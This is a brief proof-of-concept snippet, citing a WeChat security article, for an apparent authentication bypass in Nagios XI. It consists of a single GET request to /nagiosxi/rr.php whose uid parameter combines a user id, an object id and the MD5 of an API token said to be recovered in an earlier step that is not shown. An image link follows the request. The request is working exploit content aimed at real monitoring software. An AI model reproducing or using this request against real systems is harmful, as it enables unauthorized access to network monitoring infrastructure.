Reference source: [GNUSEC](https://mp.weixin.qq.com/s?__biz=MzI3MjA0ODgwNQ==&mid=2651087868&idx=1&sn=48251c39ed31db7116889913ea4d3dc8&scene=1&srcid=0603gTXuxET7NJsMKXDSTLF0&key=8d8120cb97983fadeb6c682a37490f8b76e5f89f0d36466a0d56c0353187341bcffe7a0d983d92bf9dee537d783e7f4a&ascene=0&uin=MTE4NDAxNTgyMQ%3D%3D&devicetype=iMac+MacBookPro11%2C1+OSX+OSX+10.11.4+build(15E65))
[POC]
```
// uid == <user_id>-<object_id>-<MD5(api token)>; the hash value is the MD5 of the token recovered in the previous step
GET /nagiosxi/rr.php?uid=1-b-<hash> HTTP/1.1
```
![](http://mmbiz.qpic.cn/mmbiz/y5cx3dlMfic9OjcwNxkcI391JFSPf5SYqK1WkyFgYVcThf0AKOIU3oaWatH5r3PLJQwltAsdgnsVfaQWH1yzWRA/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1)